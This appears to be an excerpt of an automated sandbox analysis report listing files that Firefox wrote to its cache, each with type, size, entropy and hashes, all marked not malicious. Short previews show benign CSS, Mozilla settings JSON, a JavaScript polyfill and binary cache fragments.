                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:v+eyheEVGq8BRwtkQpSCSkrJAy/Gk/KimiHfbaI8j3qOcdBf5dByr:v+eLYGBRohX1r1uk/KiFTaIdLBLByr
                                                                                                                                                                                  MD5:21AFCF326090D3E88CE403DF7F233B56
                                                                                                                                                                                  SHA1:09730092670DC9CFE0043E832DEB184735752E61
                                                                                                                                                                                  SHA-256:71D301F51FDE5E46673C48742607EC49E95A5A27B89D76CB0F040BB1F3E2D11F
                                                                                                                                                                                  SHA-512:4D71896324B26B682FFC88BE610DF9941C8A033ACD8198C8731C5C7B26666115D299233F801CAB5082C309CF7DB07B208CC7447CE53F60D183B9EB288B08AD6E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3642754048
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):286734
                                                                                                                                                                                  Entropy (8bit):7.991493996495767
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:6144:yEFlXQh/9+k8qPkLJWpwwtZCZrjU2Ez+sxlz8rV+UqJ4XHsSv:yclAh/syk9WyfLYz85H3sm
                                                                                                                                                                                  MD5:AB5247A067B99BCCE8F899C046B0C3C9
                                                                                                                                                                                  SHA1:6FB9C125DF4ED632239E18BFAC37D4C0C4C30157
                                                                                                                                                                                  SHA-256:ACBB05F31E3448006129C1DA9DB33E8A18A8C94CD0CA5414FAC995F1EF2FFF06
                                                                                                                                                                                  SHA-512:B05B3731A1EFB94494C02A7B8503BB9972D2DBD08D96D40C23AECE88EDB7DDF92599F2E00AE5A383260F7E687BDF7EA7A23429301CA90E75C3053C50FF8E47C3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2877816832
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45831
                                                                                                                                                                                  Entropy (8bit):7.890892157917209
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:mpuVaVxaLp/E/f+W9SRK4DkzDX/rtlkYNzz4IlBU+VytdCrhXxh9zSFHpA22r7zd:mpuVaVxaLp/Sf+W9KgnJ13HWor3mDEGE
                                                                                                                                                                                  MD5:08F00E463031F53D133248A6F21D597A
                                                                                                                                                                                  SHA1:972B44D4C79E277D4AC0348C5B2CB79FA5B1EC06
                                                                                                                                                                                  SHA-256:D9001067DEEAD5EA1CE2FAE26B71984EF1938D43AD1D09DBBE8CE0B734A1FA0A
                                                                                                                                                                                  SHA-512:30F23B9B88AF69B21F0F928F5B6278DDF70E0C178D6D50CB488B4F8C9EE41DBD4CD2D6FEA745EAC1686FD8571AF8C05B4A9A16A86ADD11F9D7F6AB65BF197D64
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21700, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29973
                                                                                                                                                                                  Entropy (8bit):7.845267130638238
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5bfiBWlRPm5fjrruYJGTiqlO3fo/tMtVpD0La83:AWLivuYJGTiqSUt+83
                                                                                                                                                                                  MD5:B065D139ED811CEBB4F3E7317AA55017
                                                                                                                                                                                  SHA1:98D9D2B086015CB2DFE2E33CBE26981666B3A699
                                                                                                                                                                                  SHA-256:4E431AE971A15262298607C40A3E80C7CB1171442CAF449754A5A86E027FB0D2
                                                                                                                                                                                  SHA-512:FB0BEBB8D0910A6B3B3E15D34578D9BAE01141DC67AFF594EFFC5F689F9FECB1B9858749E7C477160370FB7F1D30D1EBAE296F6646900DC24BB916496EF1F3E9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29373
                                                                                                                                                                                  Entropy (8bit):7.449946457219104
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:QBvdHyn6DVVMpVEHVQHM2Ni9aHJnZNCK/7VqN4mApqN3Xo70tNo+pwPm082nyFzk:wW6vMkHHQ7NBUApQHkKo+pwPo2D
                                                                                                                                                                                  MD5:DBEC62BBDAE247B6D6DEE610DE0181E9
                                                                                                                                                                                  SHA1:38F2D779D53E21AC4C7BA5453C969AC1B266B9E4
                                                                                                                                                                                  SHA-256:9E42BD0D9A3051E53C06503324968A0303E7D6EC3530C8F188708D4FBF1AF4E3
                                                                                                                                                                                  SHA-512:DE1A6A66F102703A0F2946C6BABC7498164CCA23E5C0F6313CD0D277CFAD8EF093D4000DB401E0315DF6D1600E7D3957EDF125098B7F1F62674FFE09D80F918A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8637
                                                                                                                                                                                  Entropy (8bit):6.102926249071529
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:tBkeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdJT0dJT9:UeLYGBRohB1r1uk/KiFTaIdaO/
                                                                                                                                                                                  MD5:4CC724D25EEB3D6AAFA8E35CEEDCD601
                                                                                                                                                                                  SHA1:91906BE686B84A89D95B503F09DF0AA41448E3F3
                                                                                                                                                                                  SHA-256:55DCEE33B03F3C51A87E9049490667A2ED060C1378C567EDFC338A67603F03DB
                                                                                                                                                                                  SHA-512:61BA3D1A0C65C932613FB6AB94377F577EA79E8C46BEAF64D545D7D2DBB0FC4B6864A8E218D7F5B0F32F1EDC749897A834EF3E2869380DAE66BBC349ACDACE3D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (48922)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):598149
                                                                                                                                                                                  Entropy (8bit):5.34252288716915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:xsBTq1C6Qi0QeCLzTIk5raIcD6XRFls6J8c:xsB2oBvSLzhQYFlTqc
                                                                                                                                                                                  MD5:FD820CDCF5C77FEDD52EAFE6B23A093A
                                                                                                                                                                                  SHA1:597E8C08B10181D3BB308D0E79613FC9C79FE987
                                                                                                                                                                                  SHA-256:2AA368982443AB3A052E3920602EC83C416729FAE64AB4DC31077634514C8FF4
                                                                                                                                                                                  SHA-512:E9C414BCBD5150B4C549255ED182B1A96CEE8F99BF09D9915766F17E3DC554A2C117A6AD0109107A07CAB1DBBD2AC0AFCDDE80115AF8987E50B562B3950B52AC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}textarea,.inputtext,.inputpassword{border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px}textarea{max-width:100%}select{border:1px solid #ccd0d5;padding:2px}input,select,textarea{background-color:#fff;color:#1c1e21}.inputtext,.inputpassword{padding-bottom:4px}.inputtext:invalid,.inputpassword:invalid{box-shadow:none}.inputradio{margin:0 5px 0 0;padding:0;vertical-align:middle}.inputcheckbox{border:0;vertical-align:middle}.inputbutton,.inputsubmit{background-color:#4267b2;border-color:#DADDE1 #0e1f5b #0e1f5b #d9dfea;border-style:solid;border-width:1px;color:#fff;padding:2px 15px 3px 15px;text-align:center}.inputaux{background:#ebedf0;border-color:#EBEDF0 #666 #666 #e7e7e7;color:#000}.inputsearch{background:#FFFFFF url(/rsrc.php/v3/yL/r/unHwF9CkMyM.png) no-repeat left 4px;padding-left:17px}.html{touch-action:manipulation}body{background:#fff;color:#1c1e2
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9023
                                                                                                                                                                                  Entropy (8bit):6.116541785429678
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:xBdeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdLcdLY:ReLYGBRohB1r1uk/KiFTaIdaYk
                                                                                                                                                                                  MD5:E471F71935F3AF05386B1E2773178BF6
                                                                                                                                                                                  SHA1:4350D5D9A297BED3AA8C80314F6369E3B6A6A2DA
                                                                                                                                                                                  SHA-256:7EBD125AFE6030AFF20ED1AEC94083C3F1B1D4560586F06A94D9316CC294DC2D
                                                                                                                                                                                  SHA-512:D265A8BCB93B0ADC068D6602C76C06A234EEA615C9795D656052BC8AF25C9CC388AEB9EF8858CB3E93C617A3FF4FACC70D074C2B3C3FCE0D5C228BB97A51D897
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"id","schema":{"type":"object","title":"Language dictionaries","required":["id","dictionaries"],"properties":{"id":{"type":"string","title":"Language","description":"Identifier (eg. \"es-AR\")."},"dictionaries":{"type":"array","items":{"type":"string","minLength":1},"title":"Dictionaries","minItems":1,"description":"List of dictionaries identifiers (eg. \"es-AR@dictionaries.addons.mozilla.org\").","uniqueItems":true}}},"signature":{"ref":"oyfuwv3n2mveofpa74z6l5ap","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"-ZLHHEcEvoCb6Hva40WWIVJIMPCXKBcA8iaLGdii80Fjb4Zt9UMqMUPqEGvjiwHyWcAvwqJyCWpxMRZ1cYFJ7BFupUFBh2bLxnwBsWgLL8OhfbIrJoEzR8xBaFfwJeHs","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDV
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (11594)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):314667
                                                                                                                                                                                  Entropy (8bit):5.466328776193171
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:JRPHaQFjYx81I5e+3Uz1PlJ/yfJJubY9OD47YzD4HEBuP2IUeOkFCbPIO6I3uclq:Jh/8xm7AP2Iqn/UmxgcSDOO1s6J8+7p
                                                                                                                                                                                  MD5:39212F8F216B41AE3DD8F68C913DE421
                                                                                                                                                                                  SHA1:F906446173F837B27FD29C8DF7DF2EEB3ABA3F12
                                                                                                                                                                                  SHA-256:FB6AA54B43CDF8ACC8377CA04B99F51A1F579F16E9F8274F76C3566E435A097A
                                                                                                                                                                                  SHA-512:A360060BC5D498A4D0EDBFB5F761E05E16FD86759CAA63B50C607F304AE2BECA78C46D8789A7BC87B237930CF9FC2A8EFC42D922379DB2D0C8608CEE3A65CD13
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8696
                                                                                                                                                                                  Entropy (8bit):6.115509005879072
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zjBH8aeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdzYdzS:zp8aeLYGBRohB1r1uk/KiFTaIdakG
                                                                                                                                                                                  MD5:BD1BAECF26B70F920B27E308CC88BEBE
                                                                                                                                                                                  SHA1:779E3DE5AC7D0F214077263403A0CA393E3A5B64
                                                                                                                                                                                  SHA-256:0AEC41207F97F795D8212FE6B46867E891D1BCB939965B60BC3A80EF2B6F7389
                                                                                                                                                                                  SHA-512:680750A6A7C1FE5608FE52E68A27443AFE8AB1BB4724D88E1733D4DCF4E8BD24B41A2C115C81AF3E0253D6303CE83DC67CD4307328DD421CB5DEA8CC8918DB94
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17434
                                                                                                                                                                                  Entropy (8bit):6.4282374831783935
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Te27VqN4mApqN3Xo70tNo+pwPm082nyFz/aox:WApQHkKo+pwPo26
                                                                                                                                                                                  MD5:E5FDF27EA11957967EC4DC5DF994B299
                                                                                                                                                                                  SHA1:A80F7966B70B8C5C234D49EA8AC710405EEB9624
                                                                                                                                                                                  SHA-256:8E06EDF5AAE855BFC12AEE20486DAA63264AC4B8E21B0573036F3A224E12E5FE
                                                                                                                                                                                  SHA-512:DD00BFA62A5A46447D025507732E21DBA76A1738581D40D2EF8BB83421C8D21B0F403C527A66537C0A3BF57C39BE842499F4F6A68899DE9EF8CFB140480D13B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8593
                                                                                                                                                                                  Entropy (8bit):6.101884017804886
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:BSBreyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdoJhdoJc:BgeLYGBRohB1r1uk/KiFTaIdamr
                                                                                                                                                                                  MD5:EFA07930F2A3BFEE918D0A797C4DDAE2
                                                                                                                                                                                  SHA1:9ECFAAC07E5841EC86F9602B9D1935B2C690C92B
                                                                                                                                                                                  SHA-256:441D8FB4ED1A0772D7C00F1BFFB7E3D94ACF2FC2080C70742497EAD09427432F
                                                                                                                                                                                  SHA-512:78226DCA65C20B8D0549B7A589157FB07243DC75BEEAD90E2701BBEA214DEA9C466CAD732B7F3B867EE1AE76E8809862798935AABE54BA3E07BEE9D1F5F543BA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9614
                                                                                                                                                                                  Entropy (8bit):6.277520957713529
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:rkiYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxknKN3jKN3k:rkhmzwTWvoglJmzwTWvogrBHJm2OdAn0
                                                                                                                                                                                  MD5:28CAE22A9A65DB1A71298BE1CF82EB69
                                                                                                                                                                                  SHA1:0639201650A972AA270D32DB026828440969F892
                                                                                                                                                                                  SHA-256:DD955481C07CCE84EF851FF9E5579E539FCE09AF11BEB6F344CF5E6317E98FA9
                                                                                                                                                                                  SHA-512:B9AFC5897D1286BD07227CA2C879C79D25FEB134204F6A7471DAE74081737AC3AE01F4FB16B5FDB59AE6B6FB0B5FBE0DE4242D049C1658B9AD5B2DD7E441D022
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19598
                                                                                                                                                                                  Entropy (8bit):5.895382952367393
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:qQbwapzh6fBPSgVzZFQKeLYGBRohB1r1uk/KiFTaIdaym:qQbwapzAfBPSg5nQKe8GvIDuuKOa8y
                                                                                                                                                                                  MD5:8DA3C83FA8E038CC5534E524BEB8111A
                                                                                                                                                                                  SHA1:5DE2579BE55729C7C4AD4BBDEAC70CF91EB181CD
                                                                                                                                                                                  SHA-256:B5C87B00D6FD37F9C2B8DB59B788A537E088496B1C02E296A9861E4E468B2B83
                                                                                                                                                                                  SHA-512:03537071DBC68A8C8912658BCE84B69EFCD0B7E4DBA4BA7FB844473BA400766BE4A44F9242DB50AA2CE6BDDDFD1EAC1985ABF0DC4EF6BD4637473E2D7FB1F807
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["telemetryId","searchPageRegexp","queryParamName"],"properties":{"taggedCodes":{"type":"array","items":{"type":"string","pattern":"^[a-zA-Z0-9-._]*$"},"title":"Partner Codes","description":"An array of partner codes to match against the parameters in the url. Matching these codes will report the SERP as tagged."},"telemetryId":{"type":"string","title":"Telemetry Id","pattern":"^[a-z0-9-._]*$","description":"The telemetry identifier for the provider."},"organicCodes":{"type":"array","items":{"type":"string","pattern":"^[a-zA-Z0-9-._]*$"},"title":"Organic Codes","description":"An array of partner codes to match against the parameters in the url. Matching these codes will report the SERP as organic."},"codeParamName":{"type":"string","title":"Partner Code Parameter Name","description":"The name of the query parameter for the partner code."},"queryParamName":{"type":"string","title":"Search Query Parameter Name","d
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21806
                                                                                                                                                                                  Entropy (8bit):6.147496409368541
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:V6nEWRLZ7a7VqN4mApqN3Xo70tNo+pwPm082nyFz/cRGR6:VKLZTApQHkKo+pwPo2p
                                                                                                                                                                                  MD5:4395EE77F2AC5FEF5A91DB46A5ED77EE
                                                                                                                                                                                  SHA1:100BD363ED8DCC33369DA75D3F3EC59DAA5DA0B2
                                                                                                                                                                                  SHA-256:283157AC997686BB0D98D76FD3FB1BFFD4F705015C4C2C08B473A6C83961FDE7
                                                                                                                                                                                  SHA-512:C70F99A00337E9B4ECE98AF2B3C07BB3398B3DC247C8BFAFB509EF25EB141198285A296E98C391634ED9E861D9CD1560EB82E77B565785868439EE04EA5E45A6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.040947118500706
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:keMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckKLUcuKLc:qWebV2GZuZrFK0k0t7qW0NbZovEp/h
                                                                                                                                                                                  MD5:9028A57A57D25CADFB820DA154F8F3B8
                                                                                                                                                                                  SHA1:F408D85B2290D022BDFCB107DD9B76CFB3D8BDC7
                                                                                                                                                                                  SHA-256:5054FB371C24DBBE0AEC4A3BD192763B539E23D6DEE2403AEB2BCBF08EE743E0
                                                                                                                                                                                  SHA-512:D84DD687804949105F708A882DDFE5FBD885D4D6E7FA7F247AF0289FB10DB9E33E412455939A2BFCDCA971B094B2D82AB5D2ACE74D81B1C3CB838DFFC2D7D03E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:\(}a........e...e...F.A.e...........a,~1708514995,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/b3e287d1-bcec-4242-9158-4e1296363490.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22171
                                                                                                                                                                                  Entropy (8bit):6.187297046751415
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:M6CIgwJ0xmmS5Yvd7VqN4mApqN3Xo70tNo+pwPm082nyFz/wRsRz:MBpwqBgYuApQHkKo+pwPo2O
                                                                                                                                                                                  MD5:963A94FA94936F874F1E3763A015343F
                                                                                                                                                                                  SHA1:2A1125D0330F346D74AEA0EA876271CBE6BAC937
                                                                                                                                                                                  SHA-256:E31A4CE49DDAB2545D007FAAA677D1ABCA64639AB4053F4EC347A6A13E0C594C
                                                                                                                                                                                  SHA-512:88FB65BDB70964A734799276E62A67EE5207070D9349B82DD6A29CFD4E980A3CBBD95FA1CC38DB6BDE082C22D53552015E5517B680B2F1B93448CA126C2FCB65
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... ftypM4A ....M4A mp42isom........moov...lmvhd.............D..T.................................................@...................................trak...\tkhd....................T.................................................@...............mdia... mdhd.............D..T.U......"hdlr........soun.................[minf....smhd...........$dinf....dref............url ........stbl...gstsd...........Wmp4a.........................D.....3esds........"........@.............................stts....................stsc.......................hstsz.......................~.......k...................a...c...[...Z...c...`...d..._...^...\...e..."....stco................udta....meta......."hdlr........mdirappl.............nilst.....nam....data........error....cpil....data.............pgap....data.............tmpo....data.............(.too... data........iTunes 12.3.1.23....----....mean....com.apple.iTunes....name....iTunSMPB....data........ 00000000 00000840 00000063 0000000000004B5D 0000000
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12974
                                                                                                                                                                                  Entropy (8bit):6.043140114486337
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:H/UXu9fiGLm4pUuE0M6dtE0M6dwtLuQ9Qs:fU+Bi8mCUuE56dtE56dw3
                                                                                                                                                                                  MD5:52C2C98BEFCA3DEF0EE5F2B48A5A9215
                                                                                                                                                                                  SHA1:5CB94B53EDE791B7F4F263068A8C2ADD4893AA31
                                                                                                                                                                                  SHA-256:9D3528E4642997F3295348BF82A2E50704BFC9EED443781883AEBC2F5652DF32
                                                                                                                                                                                  SHA-512:FAE7D8FB749B83E74C34322B3037F763C83E047859C0D3B3695A74A07BD85E271340C2C13947A7F879A1F9111BF614247F32D53FE7F34A38344DF4CCE33D83E3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10991
                                                                                                                                                                                  Entropy (8bit):6.088519108242144
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:38YPmO+FaPYep0Bz+eyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdADz3:MYAUeLYGBRohB1r1uk/KiFTaIdaMJ
                                                                                                                                                                                  MD5:2568F138EFFCAC57B74AE3A0D0BC6D6F
                                                                                                                                                                                  SHA1:90965214A84E5AC1F65AD286C244ED4AA0665A5D
                                                                                                                                                                                  SHA-256:88BF7AEAB36682E097AF762B4C55153BD32AED1DBB6BF170947DF014970C8AEE
                                                                                                                                                                                  SHA-512:4E1740A77DE32C7790655BAC6A06D4F66AC4A5E212B6D941D84D976B06DD546D834649516E8CDECF1501C65366B374C4432BA3381ACADFB0EAB1708F2C252DFA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","title":"The root schema","$schema":"http://json-schema.org/draft-07/schema","default":{},"examples":[{"id":"cloudflare-US","uri":"https://mozilla.cloudflare-dns.com/dns-query","UIName":"Cloudflare","autoDefault":true,"canonicalName":""}],"required":["id","uri"],"properties":{"id":{"$id":"#/properties/id","type":"string","title":"Provider ID","default":"","examples":["cloudflare-US"],"description":"A unique identifier for the provider, for referencing in regional config"},"uri":{"$id":"#/properties/url","type":"string","title":"Provider endpoint URI","default":"","examples":["https://mozilla.cloudflare-dns.com/dns-query"],"description":"Used directly as the provider's DoH endpoint URI"},"UIName":{"$id":"#/properties/UIName","type":"string","title":"UI Name","default":"","examples":["Cloudflare"],"description":"Provider name to display in UI. Provider will not be shown in UI if omitted"},"autoDefault":{"$id":"#/properties/au
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15948
                                                                                                                                                                                  Entropy (8bit):6.070859937802444
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:P7VqN4mApqN3Xo70tNo+pwPm082nyFz/aOw:EApQHkKo+pwPo2J
                                                                                                                                                                                  MD5:66DC97BC473D2ED80A47A8F8956BC13C
                                                                                                                                                                                  SHA1:1FED223B814B9C940B743259097494D94CCD9B85
                                                                                                                                                                                  SHA-256:8E680B62AA52939FCA3C63DFA325D110FAECCD53ACEAE81239ECE999220EEB9C
                                                                                                                                                                                  SHA-512:B479D60E703B79E9064F3A6731133A8EE952FA45BE517262B67A0EA8D18BF5A2F632ECB7F3343D008CEB5270F05D4DE6D6E4D0A62CCEB1DF10F71B1E99EA5954
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ..R%.\.%sv.....}...ht~..s..P..6].A...ro....-FY..-..N....(".....T.."..Y...m.b. = ...UU...:5.-.i>..gj....$.g#..]...........:K5a./f. .U.H..t....:..7.D...F....fAl'.}..e......q.8.9..X..r......;. .....F.*.A......n.Y......}..$0z....N.v.D.....N.......r.............e.."F.B.g.....k....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/87423d78/cssbin/www-onepick.css.strongly-framed.1.security-info.
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):30952
                                                                                                                                                                                  Entropy (8bit):7.488427511749104
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:RfIprxJuDyB/oeyQFd2SYxQUnoSV9dyzkRx+oy7VqN4mApqN3Xo70tNo+pwPm084:RfIpPBf3Ohnoi3yI+AApQHkKo+pwPo2L
                                                                                                                                                                                  MD5:3C7AAB45C94D8C0A5C62679F63FED621
                                                                                                                                                                                  SHA1:224A398F054B62DC9D722267186428B49FD6EFDD
                                                                                                                                                                                  SHA-256:357DFBD71B1EC10E0C5806D6C022547A95CAED0AB522DF56D5B54053771B6E63
                                                                                                                                                                                  SHA-512:DFF301D6D9EF8C19E2601ABC1F75E873063EE386A6694ECE6EEBEC3F19F9EC07358657FB71F7D9C24E92AFBB265E65BE0C448190AFB658DE13FA51ECD7E8DFE8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3274)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):466198
                                                                                                                                                                                  Entropy (8bit):5.470151995228632
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:i7gniZbz80T44cQr9yTkXsOMlZITy+AEJO5M4PLCHkShkCrfa3/1UGRA32es6J8K:iph9yTkXNMITyRbuHfa+hs6J8K
                                                                                                                                                                                  MD5:1142F6D2771CA36BAD8A92A28A54C6FC
                                                                                                                                                                                  SHA1:BCE84D05FBD89B1CBD9B7F590E60C979243D2C8C
                                                                                                                                                                                  SHA-256:5E397B15E7ABF3528EFA3D6A02BB064557BB0670550FF081F9E6A40B92CD7C10
                                                                                                                                                                                  SHA-512:D60FCC742382FA2FC93BC18FFDB108762DDD5B7D1562555DDA25BF910F886C5E0069100275B64628C9FD7C6D596F881E1B52231DBD4EEE0204A421001D4C7115
                                                                                                                                                                                  Malicious:false
